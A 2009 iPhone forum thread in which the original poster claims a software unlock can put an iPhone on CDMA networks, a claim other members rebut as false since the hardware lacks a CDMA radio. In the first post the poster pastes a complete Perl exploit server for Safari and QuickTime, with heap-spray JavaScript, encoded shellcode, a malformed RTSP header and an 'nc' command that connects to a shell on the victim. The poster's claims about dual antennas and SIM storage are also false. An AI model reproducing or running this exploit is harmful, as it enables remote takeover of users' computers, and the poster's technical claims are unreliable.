Fallacy? I prefer ignorance...

Discussion in 'iPhone' started by NeuroKinetic, Jan 21, 2009.

1. NeuroKinetic macrumors newbie

Since you've closed the thread before I can post I'll add my response here, the phone isn't "bound" strictly to GSM.

So? Since you've always been told; from Apple:

# UMTS/HSDPA (850, 1900, 2100 MHz)
    # GSM/EDGE (850, 900, 1800, 1900 MHz)

There is more, more that they don't tell or show you about these frequencies, if you tampered with your phone you'd see what I mean.

That's because the iPhone is on the commercial frequencies, but. It is also a Quad-Band Phone, which will allow it to work on the same frequencies on the CDMA Side. The base software has it locked to only go to the GSM Side, but... Through cracking of this software it will operate on both.

That is how an "Unlocked" phone is able to operate on "either network." It has both antennas built into it, that is why a Razr for Verizon has a "slot" for a simm-card, but they use a storage card. Since the Simm Card also can act as a very small "storage" they just input a larger one.

The iPhone works on the same principle, it has both antennas built into it. That is why once it's Jailbroken / Unlocked it works. For instance, China has unlocked iPhones that work on CDMA / GSM.

It's just a matter of getting access to the phones baseband.

http://news.cnet.com/software-unlock-for-iphone-3g-coming-soon/
    http://blog.iphone-dev.org/

Some articles for you disbelievers, I will say this. You don't know me, or my job. But considering I have it, it's plausible and can be done.

You call it fallacy, I call it ignorance to technology. If you believe it is caught in black & white it's not. Technology is gray, that is why you can find flaws in almost anything.

That's why something like this:

use Socket;
    use IO::Handle;
    use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";
    $buf = chr(0x11) x 6000;

# don't touch anything below this line
    $html = <<ENDHTML;
    <script>
    var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");
    var shellcode = unescape("$shellcode");
    shellcode = prefix + shellcode;
    var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
    do {
    spray += spray;
    } while(spray.length < 0xc0000);
    memory = new Array();
    for(i = 0; i < 50; i++)
    memory = spray + shellcode;
    var url = "rtsp://" + location.host + "/x.mp3";
    document.write("<EMBED SRC='" + url + "' TYPE='video/quicktime' AUTOPLAY='true' />");
    </script>
    ENDHTML

$rtsp_body =
    "v=0\r\n" .
    "o=- 16689332712 1 IN IP4 0.0.0.0\r\n" .
    "s=MPEG-1 or 2 Audio\r\n" .
    "i=1.mp3\r\n" .
    "t=0 0\r\n" .
    "a=tool:hello\r\n" .
    "a=type:broadcast\r\n" .
    "a=control:*\r\n" .
    "a=range:npt=0-213.077\r\n" .
    "a=x-qt-text-nam:MPEG-1 or 2 Audio\r\n" .
    "a=x-qt-text-inf:1.mp3\r\n" .
    "m=audio 0 RTP/AVP 14\r\n" .
    "c=IN IP4 0.0.0.0\r\n" .
    "a=control:track1\r\n";
    $content_length = length($rtsp_body);
    $rtsp_header =
    "RTSP/1.0 200 OK\r\n" .
    "CSeq: 1\r\n" .
    "Date: 0x00 :p\r\n" .
    "Content-Base: rtsp://0.0.0.0/x.mp3/\r\n" .
    "Content-Type: $buf\r\n" .
    "Content-Length: $content_length\r\n\r\n";
    $rtsp = $rtsp_header . $rtsp_body;
    $http_header = "HTTP/1.1 200 OK\nContent-type: text/html\n\n";
    $| = 1;

my $port = MY_HTTP_PORT;
    my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";
    setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";
    my $my_addr = sockaddr_in($port,INADDR_ANY);
    bind(SOCK,$my_addr) or die "bind() failed: $!";
    listen(SOCK,SOMAXCONN) or die "listen() failed: $!";
    warn "waiting for incoming connections on port $port...\n";

$repeat = 1;
    $victim = inet_aton("0.0.0.0");
    while($repeat) {
    next unless my $remote_addr = accept(SESSION,SOCK);
    my ($port,$hisaddr) = sockaddr_in($remote_addr);
    warn "Connection from [",inet_ntoa($hisaddr),",$port]\n";
    $victim = $hisaddr;
    SESSION->autoflush(1);
    $request = "";
    while(<SESSION>) {
    $request_line = $_;
    $request .= $request_line;
    chomp($request_line);
    if($request_line =~ /DESCRIBE rtsp/) {
    $repeat = 0;
    }
    $x = length($request_line);
    if($x <= 1) {
    last;
    }
    }
    print STDERR $request;
    if($repeat) {
    print SESSION $http_header . $html;
    }
    else {
    print SESSION $rtsp;
    }
    warn "Connection from [",inet_ntoa($hisaddr),",$port] finished\n";
    close SESSION;
    }
    print "Connect to ".inet_ntoa($victim).":4444 after 5 seconds\n";
    print "nc -nvv ".inet_ntoa($victim)." 4444\nEnjoy!\n";

A lovely little exploit to Safari and Quicktime, anyways. Point aside, it can be done. Don't believe me fine, was trying to help. You'll see soon enough once I start posting tutorials doing it.

By the way you can threaten or delete my account, I don't care. Was just trying to help you.

2. Tallest Skil macrumors P6

Tallest Skil

This is the most detailed "he's wrong" comeback I've ever seen. :eek::D

I'm not a baseband guy.

Someone tell me if he's still blowing smoke or if he has something here. I'm sticking with "CDMA≠GSM" until I get some confirmation here.

3. CocoaPuffs macrumors 68010

Yay, we got a response from you!

How is Safari hack (that's the code you are copy and pasting) relevant to baseband hack? Also, what does it have anything to do with Verizon network access?

You do understand that baseband hack is meant for other GSM network using simcard, right?

4. Tallest Skil macrumors P6

Tallest Skil

He said he'd post a tutorial...

My question is: WHY DIDN'T YOU JUST POST ONE AS THIS THREAD?! I would have loved one! I've been stuck on this worthless piece of crap Verizon phone since before I got my iPhone! I've had no service for a year and a half (with the iPhone)!

Either prove us wrong (please, please do, for my sake) or don't tell us that Safari hacks and hacks that change GSM to CDMA are the same thing! :D

Also, I'm still pretty sure that they're two different chips, too, but whatever.

5. CocoaPuffs macrumors 68010

If this was possible, Verizon for being the most subscribed service (argumentative), this would be a major news on its own.

I highly doubt a response to a very insignificant thread would be the venue used to release this news. Plus he's referring to Dev Team's blog as reference, and such news would easily be front page.

This is BS, please delete now.

6. Tallest Skil macrumors P6

Tallest Skil

I also doubt that anyone who isn't on the Dev Team would be releasing this, so let's hope that he is. :cool:

7. dukebound85 macrumors P6

dukebound85

im very interested in how you are gonna use a software hack to hack the hardware which arent compatible at all.....lol

8. Knowlege Bomb macrumors 601

Knowlege Bomb

Well if he is part of Dev Team, I doubt that he will be for long...

9. jav6454 macrumors P6

jav6454

The iPhone doesn't have a CDMA radio, the phones you are talking about are phoen that do have a doble radio. iFixit disassembled an iPhone from the start and has found no radio for CDMA.

I get your "technology is gray" point, but in this case, sorry, its black and white.The iPhone is GSM only and will stay that way until Apple says otherwise. Even the Dev Team who prod and poke the baseband to unlock have said its GSM only phone. Now, call me crazy, but I bet the Dev Team knows more than you do about the iPhone.

Like they say, "Ignorance is bliss" :D

/thread

10. NeuroKinetic thread starter macrumors newbie

I wasn't saying that was compatible, I was saying that technology is flawed... All of it, your phone, your internet browser, your high speed internet modem, your OS X computer, Windows, everything...

When I get a 3rd iPhone from my client to put on the Verizon Network, I will video it. Then I will post it.

Will that help you all out?

11. Tallest Skil macrumors P6

Tallest Skil

Sure. I await it with great anticpation. :D I'm anxious to see how you get around the fact that a CDMA phone and a GSM phone need different chips in them.

12. jav6454 macrumors P6

jav6454

To do that you will need to solder out the GSM comm chip and solder in a CDMA comm chip.

Are you willing to sacrifice an iPhones in vain?

13. dukebound85 macrumors P6

dukebound85

umm duh?

however, im not claiming i can make a phone work on a cdma network when its missing the necessary hardware to work on cdma.....

oh i will be very pleased lol:rolleyes:

14. CocoaPuffs macrumors 68010

First you said you are posting a tutorial, then you posted bunch of gibberish.

Now you are saying more gibberish? Why bother. Delete yourself!

15. NeuroKinetic thread starter macrumors newbie

16. Tallest Skil macrumors P6

Tallest Skil

Thanks! Mods, do your thing! :D

Nice try with the edit, too!

17. dukebound85 macrumors P6

dukebound85

couldnt simply post instructions eh? have to supply my phone number and receive a text with the instructions eh? no thanks:cool:

18. NeuroKinetic thread starter macrumors newbie

I'll just do it myself with QuickPwn and YellowSn0w tonight. I'll post the directions for you.

19. Tallest Skil macrumors P6

Tallest Skil

Cool. :cool: Thanks!

20. atszyman macrumors 68020

atszyman

3G is based on CDMA technology, it's often referred to as WBCDMA. GSM is based on TDMA, so the iPhone does have some CDMA capabilities.

While it's true that the antennas may cover the correct frequency ranges and be able to pick up EV-DO or CDMA 2000 technology whether or not you will be able to utilize the data on those frequencies will depend on how much of the work is done in the chipset versus the software and how "dedicated" the chipset is for it's particular function. While conceivable that it could be possible to make an iPhone work on a CDMA network, it would not be a simple task and would require great knowledge of what parts and how they are interconnected in order to pull off, and I don't believe that that knowledge would be easily obtainable even by someone who works at Apple.

21. jf8 macrumors regular

I think the CDMA parts of the OP were a troll, but your reply seems serious enough.

Wideband CDMA is usually abbreviated as WCDMA.

CDMA (as in code division multiple access) is a method for multiple transmitters to use the same channel. This CDMA is used in many communication systems, including GPS, cdmaOne, CDMA2000, and WCDMA. CDMA does not describe a specific implementation of anything.

CDMA is also used (confusingly and incorrectly) to refer to the IS-95/cdmaOne and CDMA2000 standards, which are standards for cellular mobile voice & data communication. The standards specify how CDMA should be implemented in cdmaOne/CDMA2000 equipment.

The WCDMA and CDMA2000 standards are different. Perhaps most significantly, WCDMA uses 5 MHz channels, whereas CDMA2000 uses 1.25 MHz channels (or multiples thereof). There are other differences regarding how they operate as well. A device that is able to support both WCDMA and CDMA2000 either has specific hardware support for both standards or is so abstract that most of the work is done in software (SDR, software-defined radio). But today's handsets do not use SDR to such an extent.

22. atszyman macrumors 68020

atszyman

I realize most of that, and my acronyms are often wrong. I do know that the bandwidths are different hence the data capacity increase, but also depending on the hardware/software used, you could manage to "pick off" a 1.25 MHz bandwidth out of a 5 MHz bandwidth and glean the information contained within. However my best guess, without ripping an iPhone apart (which I couldn't bring myself to do because I don't yet have one) is that the hardware is too specific to allow that kind of processing to be done in a timely manner even if it presents you with a data format where it would be possible.

In the interest of powersaving/battery life the chipset is most likely very specific in function with little to no room for processing other than it's designated purpose, and passing through unnecessary information is a waste of system resources. And even if it were possible it would require a lot of design information on the iPhone that most people aside from the Apple engineers do not have.

My point is that conceptually it would be possible that the iPhone could pick up and process the signals with significant modifications, however the likelihood of the hardware being generic enough to do it is very slim.

23. Tallest Skil macrumors P6

Tallest Skil

That was the POINT of the original post. He's claimed to be able to get the iPhone running on Verizon's network and says he will return tonight with a tutorial.

I'm waiting, at least.

24. ppc750fx macrumors 65816

NeuroKinetic:

You're full of it. Unbelievably full of it.

25. jf8 macrumors regular

It's nowhere near that simple.

Apple engineers did not design the radio in the iPhone. It's an Infineon chip.